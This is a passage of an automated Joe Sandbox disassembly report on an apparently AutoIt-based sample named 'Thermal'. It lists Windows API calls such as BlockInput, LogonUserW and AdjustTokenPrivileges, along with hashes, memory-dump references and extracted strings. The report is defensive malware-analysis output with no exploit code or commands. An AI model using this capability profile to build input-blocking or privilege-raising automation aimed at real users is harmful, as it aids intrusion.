                                                      • String ID:
                                                      • API String ID: 3536248340-0
                                                      • Opcode ID: 9bdbc63889587b0f7d319319f787392e413d8bcce192ddcf54ff6fa5f1aabe94
                                                      • Instruction ID: da35278d82a3cfa59612ab9af3a6b148e7a00efe957bda0f1bdcf5c76e1ab384
                                                      • Opcode Fuzzy Hash: 9bdbc63889587b0f7d319319f787392e413d8bcce192ddcf54ff6fa5f1aabe94
                                                      • Instruction Fuzzy Hash: 93F0497290020DABDB15DF94C805BFE7BB8FF08315F00814AF95596292D3799A16DF94
                                                      APIs
                                                      • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,00199B52,?,001B098C,?), ref: 0018A6DA
                                                      • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,?,?,00199B52,?,001B098C,?), ref: 0018A6EC
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: ErrorFormatLastMessage
                                                      • String ID:
                                                      • API String ID: 3479602957-0
                                                      • Opcode ID: c95b839561f2d5bab6863bb3c87ce338c86a3522deedc1ae8fd22f4b7d7ddeb5
                                                      • Instruction ID: ce1d1bba34c4e30254fc0c85413da03a0344d3523b8b6d9f7baf5baa8bd571dd
                                                      • Opcode Fuzzy Hash: c95b839561f2d5bab6863bb3c87ce338c86a3522deedc1ae8fd22f4b7d7ddeb5
                                                      • Instruction Fuzzy Hash: 2FF0893550421DBBDB21AFA4CC48FDA776CBF09351F004256B91896151D7709654CFA1
                                                      APIs
                                                      • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00178F27), ref: 00178DFE
                                                      • CloseHandle.KERNEL32(?,?,00178F27), ref: 00178E10
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: AdjustCloseHandlePrivilegesToken
                                                      • String ID:
                                                      • API String ID: 81990902-0
                                                      • Opcode ID: 19eea5f6720fab36e1c486d3f67bac38cfaad09d1e2b3111950925f63c1f0c36
                                                      • Instruction ID: 25ef7b689a817c8358ec75f4c7acdf7d6cae57d09fe6b99e0210316e5fda75be
                                                      • Opcode Fuzzy Hash: 19eea5f6720fab36e1c486d3f67bac38cfaad09d1e2b3111950925f63c1f0c36
                                                      • Instruction Fuzzy Hash: EBE0B676010610EFE7266B60EC09E777BEDEB08350B248929F49A81870DB62ACD0DB50
                                                      APIs
                                                      • SetUnhandledExceptionFilter.KERNEL32(00000000,?,00148F87,?,?,?,00000001), ref: 0014A38A
                                                      • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 0014A393
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: ExceptionFilterUnhandled
                                                      • String ID:
                                                      • API String ID: 3192549508-0
                                                      • Opcode ID: c8674b741130da7388e0e67daf3dc41a2a20e6e639363d1355c4e37afcc0dac6
                                                      • Instruction ID: b83cd3b4d3f0724aaf3dea91362ea340f177612330c21a5846d83e5195e489a1
                                                      • Opcode Fuzzy Hash: c8674b741130da7388e0e67daf3dc41a2a20e6e639363d1355c4e37afcc0dac6
                                                      • Instruction Fuzzy Hash: 99B09231064208AFCA422B91EC0DB8A3FA8FB48AA2F004110F60E44870CB6254908A91
                                                      APIs
                                                      • BlockInput.USER32(00000001), ref: 001945F0
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: BlockInput
                                                      • String ID:
                                                      • API String ID: 3456056419-0
                                                      • Opcode ID: ef4d86023d34fa572ddbd2463acc263a678f304a2c1da7cab17e2c5f897ea05d
                                                      • Instruction ID: 2ba63ed16c3c58b0d08e43328a69a00147674eb45e180305eaa823ff4d0d147b
                                                      • Opcode Fuzzy Hash: ef4d86023d34fa572ddbd2463acc263a678f304a2c1da7cab17e2c5f897ea05d
                                                      • Instruction Fuzzy Hash: F9E0DF31200219AFD710AFA9E800E8BF7E8AFA87A0F01C016FC09C7310DB70F8418B90
                                                      APIs
                                                      • mouse_event.USER32(00000002,00000000,00000000,00000000,00000000), ref: 00185205
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: mouse_event
                                                      • String ID:
                                                      • API String ID: 2434400541-0
                                                      • Opcode ID: 741bd12cbcd46ee7399936faf96be3b668c63c9d6ef5d879d6b69169c936610d
                                                      • Instruction ID: 566311cef8abf992d5f0a6e99bec9ca46cc06f5262a5faa0e7bc92831dd30388
                                                      • Opcode Fuzzy Hash: 741bd12cbcd46ee7399936faf96be3b668c63c9d6ef5d879d6b69169c936610d
                                                      • Instruction Fuzzy Hash: 63D052A4260E0A38EF2823248E0FF76020BE3217C0F8442897002894C2EFD06A85AE31
                                                      APIs
                                                      • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,00178FA7), ref: 00179389
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: LogonUser
                                                      • String ID:
                                                      • API String ID: 1244722697-0
                                                      • Opcode ID: 9ca27dc81d270b6108d5f1245ad3507c77fac7d255615353cdeec4b69ddc14e0
                                                      • Instruction ID: 0411e140ae80c78d40630055e31defad9dd08fb4eb8ae1a2b00fc1e81670aad1
                                                      • Opcode Fuzzy Hash: 9ca27dc81d270b6108d5f1245ad3507c77fac7d255615353cdeec4b69ddc14e0
                                                      • Instruction Fuzzy Hash: 3BD05E3226050EABEF019EA4DC02EAF3B69EB04B01F408111FE15C50A0C776D835AB60
                                                      APIs
                                                      • GetUserNameW.ADVAPI32(?,?), ref: 00160734
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: NameUser
                                                      • String ID:
                                                      • API String ID: 2645101109-0
                                                      • Opcode ID: 1a59af56b0721f35c1394a0c5f61541e38631e1fb77313e1abd2c639cf0a8f7b
                                                      • Instruction ID: 4d1b44d9bc7a127c65d21f43d3237d640f27a8ffcd7b629cef07f98c1301dbaa
                                                      • Opcode Fuzzy Hash: 1a59af56b0721f35c1394a0c5f61541e38631e1fb77313e1abd2c639cf0a8f7b
                                                      • Instruction Fuzzy Hash: 85C04CF1800109DBCB06DBA0D988EEF77BCAB08344F100155B105B2100D7749B448A71
                                                      APIs
                                                      • SetUnhandledExceptionFilter.KERNEL32(?), ref: 0014A35A
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: ExceptionFilterUnhandled
                                                      • String ID:
                                                      • API String ID: 3192549508-0
                                                      • Opcode ID: 33a727ee03829a5479265f4da2eb81c21b2c84edebf90fb66f8e8439dec3b29d
                                                      • Instruction ID: 383ae6042fc51485d207ea3a38e74758940f679da6d97780f8e363b7f78c7eea
                                                      • Opcode Fuzzy Hash: 33a727ee03829a5479265f4da2eb81c21b2c84edebf90fb66f8e8439dec3b29d
                                                      • Instruction Fuzzy Hash: 0FA0123001010CAB8A011B41EC084457F9CE7041907004010F40D00431873254504580
                                                      APIs
                                                      • CharUpperBuffW.USER32(?,?,001B0980), ref: 001A3C65
                                                      • IsWindowVisible.USER32(?), ref: 001A3C89
                                                      Strings
                                                      Similarity
                                                      • API ID: BuffCharUpperVisibleWindow
                                                      • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                                      • API String ID: 4105515805-45149045
                                                      • Opcode ID: b196b9c2f03f621c560378af7dd0d23664264ef3deea618f5fcc501a25302e2f
                                                      • Instruction ID: 32f0d792038b608389912be3ba41a79901a05464ea6be4062602905930afbde5
                                                      • Opcode Fuzzy Hash: b196b9c2f03f621c560378af7dd0d23664264ef3deea618f5fcc501a25302e2f
                                                      • Instruction Fuzzy Hash: 09D18134204215DBCB05EF50C951FAEB7B1AFA5354F108859F9566B3B2CB31EE4ACB82
                                                      APIs
                                                      • SetTextColor.GDI32(?,00000000), ref: 001AAC55
                                                      • GetSysColorBrush.USER32(0000000F), ref: 001AAC86
                                                      • GetSysColor.USER32(0000000F), ref: 001AAC92
                                                      • SetBkColor.GDI32(?,000000FF), ref: 001AACAC
                                                      • SelectObject.GDI32(?,?), ref: 001AACBB
                                                      • InflateRect.USER32(?,000000FF,000000FF), ref: 001AACE6
                                                      • GetSysColor.USER32(00000010), ref: 001AACEE
                                                      • CreateSolidBrush.GDI32(00000000), ref: 001AACF5
                                                      • FrameRect.USER32(?,?,00000000), ref: 001AAD04
                                                      • DeleteObject.GDI32(00000000), ref: 001AAD0B
                                                      • InflateRect.USER32(?,000000FE,000000FE), ref: 001AAD56
                                                      • FillRect.USER32(?,?,?), ref: 001AAD88
                                                      • GetWindowLongW.USER32(?,000000F0), ref: 001AADB3
                                                        • Part of subcall function 001AAF18: GetSysColor.USER32(00000012), ref: 001AAF51
                                                        • Part of subcall function 001AAF18: SetTextColor.GDI32(?,?), ref: 001AAF55
                                                        • Part of subcall function 001AAF18: GetSysColorBrush.USER32(0000000F), ref: 001AAF6B
                                                        • Part of subcall function 001AAF18: GetSysColor.USER32(0000000F), ref: 001AAF76
                                                        • Part of subcall function 001AAF18: GetSysColor.USER32(00000011), ref: 001AAF93
                                                        • Part of subcall function 001AAF18: CreatePen.GDI32(00000000,00000001,00743C00), ref: 001AAFA1
                                                        • Part of subcall function 001AAF18: SelectObject.GDI32(?,00000000), ref: 001AAFB2
                                                        • Part of subcall function 001AAF18: SetBkColor.GDI32(?,00000000), ref: 001AAFBB
                                                        • Part of subcall function 001AAF18: SelectObject.GDI32(?,?), ref: 001AAFC8
                                                        • Part of subcall function 001AAF18: InflateRect.USER32(?,000000FF,000000FF), ref: 001AAFE7
                                                        • Part of subcall function 001AAF18: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 001AAFFE
                                                        • Part of subcall function 001AAF18: GetWindowLongW.USER32(00000000,000000F0), ref: 001AB013
                                                      Similarity
                                                      • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
                                                      • String ID:
                                                      • API String ID: 4124339563-0
                                                      • Opcode ID: 96eb4f02da61e8cc01459db7ac0b3299bc0c5b2f69142ff39f65f6f477133c9c
                                                      • Instruction ID: 1259ac364f48421c76e787a167de044e4ef1fadc022612bf0df8a8bcaa4e99ca
                                                      • Opcode Fuzzy Hash: 96eb4f02da61e8cc01459db7ac0b3299bc0c5b2f69142ff39f65f6f477133c9c
                                                      • Instruction Fuzzy Hash: 6CA17C72408301BFD7269F64DC48A6BBBA9FF89321F500B19F9A2965E0D731D984CF52
                                                      APIs
                                                      • DestroyWindow.USER32(?,?,?), ref: 00123072
                                                      • DeleteObject.GDI32(00000000), ref: 001230B8
                                                      • DeleteObject.GDI32(00000000), ref: 001230C3
                                                      • DestroyIcon.USER32(00000000,?,?,?), ref: 001230CE
                                                      • DestroyWindow.USER32(00000000,?,?,?), ref: 001230D9
                                                      • SendMessageW.USER32(?,00001308,?,00000000), ref: 0015C77C
                                                      • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 0015C7B5
                                                      • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 0015CBDE
                                                        • Part of subcall function 00121F1D: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00122412,?,00000000,?,?,?,?,00121AA7,00000000,?), ref: 00121F76
                                                      • SendMessageW.USER32(?,00001053), ref: 0015CC1B
                                                      • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 0015CC32
                                                      • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 0015CC48
                                                      • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 0015CC53
                                                      Strings
                                                      Similarity
                                                      • API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
                                                      • String ID: 0
                                                      • API String ID: 464785882-4108050209
                                                      • Opcode ID: 6fc83de00bf514b3ad0fea70ad66d6c3a40a3523b2bce168b9780a3905c49da5
                                                      • Instruction ID: dca4551b70d65895d059a1835b1c7a436a52c1fedab9a0dad6132ea72fa625d6
                                                      • Opcode Fuzzy Hash: 6fc83de00bf514b3ad0fea70ad66d6c3a40a3523b2bce168b9780a3905c49da5
                                                      • Instruction Fuzzy Hash: CE128E30604311EFDB25CF24D884BAABBA1BF18301F144669F965CF662D731ED99CBA1
                                                      APIs
                                                      Strings
                                                      Similarity
                                                      • API ID: __wcsnicmp$Exception@8Throwstd::exception::exception
                                                      • String ID: "$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$'$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                      • API String ID: 2660009612-1645009161
                                                      • Opcode ID: c492c7cf885805c5924325c6fcf07790dfdfff624b98362fbbf8ce8c7cac4068
                                                      • Instruction ID: 30180d25d677b1fa05f7ee9b08dd38d76f0f8a4178b323dc4ddb9bfd8dd28c1b
                                                      • Opcode Fuzzy Hash: c492c7cf885805c5924325c6fcf07790dfdfff624b98362fbbf8ce8c7cac4068
                                                      • Instruction Fuzzy Hash: 17A1CF31A00209BBCB24FF60DC52FBE37B8AF55740F104069F915AB2A2EB719E51D790
                                                      APIs
                                                      • DestroyWindow.USER32(00000000), ref: 00197BC8
                                                      • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00197C87
                                                      • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 00197CC5
                                                      • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 00197CD7
                                                      • CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 00197D1D
                                                      • GetClientRect.USER32(00000000,?), ref: 00197D29
                                                      • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 00197D6D
                                                      • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00197D7C
                                                      • GetStockObject.GDI32(00000011), ref: 00197D8C
                                                      • SelectObject.GDI32(00000000,00000000), ref: 00197D90
                                                      • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 00197DA0
                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00197DA9
                                                      • DeleteDC.GDI32(00000000), ref: 00197DB2
                                                      • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00197DDE
                                                      • SendMessageW.USER32(00000030,00000000,00000001), ref: 00197DF5
                                                      • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 00197E30
                                                      • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00197E44
                                                      • SendMessageW.USER32(00000404,00000001,00000000), ref: 00197E55
                                                      • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 00197E85
                                                      • GetStockObject.GDI32(00000011), ref: 00197E90
                                                      • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00197E9B
                                                      • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 00197EA5
                                                      Strings
                                                      Similarity
                                                      • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                      • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                      • API String ID: 2910397461-517079104
                                                      • Opcode ID: e1c5864508c007017e16eaaf5677ae781d54edb21ae38dff727ccd6ae885a486
                                                      • Instruction ID: 4b3b5c80cbf8edc34eb25e135f73611688ee3d14c3ff5468d5a5914bb2bf8272
                                                      • Opcode Fuzzy Hash: e1c5864508c007017e16eaaf5677ae781d54edb21ae38dff727ccd6ae885a486
                                                      • Instruction Fuzzy Hash: DCA15F71A00615BFEB159BA4DC8AFAF7B79EB08750F044214FA15AB6E0C770AD40CB64
                                                      APIs
                                                      • SetErrorMode.KERNEL32(00000001), ref: 0018B361
                                                      • GetDriveTypeW.KERNEL32(?,001B2C4C,?,\\.\,001B0980), ref: 0018B43E
                                                      • SetErrorMode.KERNEL32(00000000,001B2C4C,?,\\.\,001B0980), ref: 0018B59C
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: ErrorMode$DriveType
                                                      • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                      • API String ID: 2907320926-4222207086
                                                      • Opcode ID: ecf9e51dcdf810e549e630439ac970bacaaa13ab5dcf68f1a89ab2bbc5e890de
                                                      • Instruction ID: 4ec68ca94155aaf851721d58d095bdfec58bdeaf76d168daeac901b078585eb3
                                                      • Opcode Fuzzy Hash: ecf9e51dcdf810e549e630439ac970bacaaa13ab5dcf68f1a89ab2bbc5e890de
                                                      • Instruction Fuzzy Hash: 2B517030B4C609EBCB04FB60C9C2ABD77A1AB54740B268116E407A77A1DB71AF41DF59
                                                      APIs
                                                      • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000103,?,?,?), ref: 001AA0F7
                                                      • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 001AA1B0
                                                      • SendMessageW.USER32(?,00001102,00000002,?), ref: 001AA1CC
                                                      Strings
                                                      Similarity
                                                      • API ID: MessageSend$Window
                                                      • String ID: 0
                                                      • API String ID: 2326795674-4108050209
                                                      • Opcode ID: 9c6c20905b5dc9c231d6deee1dcdd782c7ab8196bca59362e79b45e0b507df56
                                                      • Instruction ID: 1e56254a3666e1af0cd6a4ae52147c431003809dbad1ff8790c71ba00b1cb385
                                                      • Opcode Fuzzy Hash: 9c6c20905b5dc9c231d6deee1dcdd782c7ab8196bca59362e79b45e0b507df56
                                                      • Instruction Fuzzy Hash: ED020078108301AFEB25CF14C848BABBBE4FF8A314F48861DF999962A1C775D954CF52
                                                      APIs
                                                      • GetSysColor.USER32(00000012), ref: 001AAF51
                                                      • SetTextColor.GDI32(?,?), ref: 001AAF55
                                                      • GetSysColorBrush.USER32(0000000F), ref: 001AAF6B
                                                      • GetSysColor.USER32(0000000F), ref: 001AAF76
                                                      • CreateSolidBrush.GDI32(?), ref: 001AAF7B
                                                      • GetSysColor.USER32(00000011), ref: 001AAF93
                                                      • CreatePen.GDI32(00000000,00000001,00743C00), ref: 001AAFA1
                                                      • SelectObject.GDI32(?,00000000), ref: 001AAFB2
                                                      • SetBkColor.GDI32(?,00000000), ref: 001AAFBB
                                                      • SelectObject.GDI32(?,?), ref: 001AAFC8
                                                      • InflateRect.USER32(?,000000FF,000000FF), ref: 001AAFE7
                                                      • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 001AAFFE
                                                      • GetWindowLongW.USER32(00000000,000000F0), ref: 001AB013
                                                      • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 001AB05F
                                                      • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 001AB086
                                                      • InflateRect.USER32(?,000000FD,000000FD), ref: 001AB0A4
                                                      • DrawFocusRect.USER32(?,?), ref: 001AB0AF
                                                      • GetSysColor.USER32(00000011), ref: 001AB0BD
                                                      • SetTextColor.GDI32(?,00000000), ref: 001AB0C5
                                                      • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 001AB0D9
                                                      • SelectObject.GDI32(?,001AAC1F), ref: 001AB0F0
                                                      • DeleteObject.GDI32(?), ref: 001AB0FB
                                                      • SelectObject.GDI32(?,?), ref: 001AB101
                                                      • DeleteObject.GDI32(?), ref: 001AB106
                                                      • SetTextColor.GDI32(?,?), ref: 001AB10C
                                                      • SetBkColor.GDI32(?,?), ref: 001AB116
                                                      Similarity
                                                      • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                      • String ID:
                                                      • API String ID: 1996641542-0
                                                      • Opcode ID: c56eb8ac8437e28da7adb51a8103d9c62739df29eff1bbd5152b4a59cf79c7d2
                                                      • Instruction ID: 7f9696dc77e021fed51cc57bb6b1167721e1d54fca03900baebd2776ce16323c
                                                      • Opcode Fuzzy Hash: c56eb8ac8437e28da7adb51a8103d9c62739df29eff1bbd5152b4a59cf79c7d2
                                                      • Instruction Fuzzy Hash: B7616B71900218BFDF169FA8DC48AAFBB79EF09320F118215F915AB2A1D775D980CF90
                                                      APIs
                                                      • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 001A90EA
                                                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 001A90FB
                                                      • CharNextW.USER32(0000014E), ref: 001A912A
                                                      • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 001A916B
                                                      • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 001A9181
                                                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 001A9192
                                                      • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 001A91AF
                                                      • SetWindowTextW.USER32(?,0000014E), ref: 001A91FB
                                                      • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 001A9211
                                                      • SendMessageW.USER32(?,00001002,00000000,?), ref: 001A9242
                                                      • _memset.LIBCMT ref: 001A9267
                                                      • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 001A92B0
                                                      • _memset.LIBCMT ref: 001A930F
                                                      • SendMessageW.USER32(?,00001053,000000FF,?), ref: 001A9339
                                                      • SendMessageW.USER32(?,00001074,?,00000001), ref: 001A9391
                                                      • SendMessageW.USER32(?,0000133D,?,?), ref: 001A943E
                                                      • InvalidateRect.USER32(?,00000000,00000001), ref: 001A9460
                                                      • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 001A94AA
                                                      • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 001A94D7
                                                      • DrawMenuBar.USER32(?), ref: 001A94E6
                                                      • SetWindowTextW.USER32(?,0000014E), ref: 001A950E
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmp
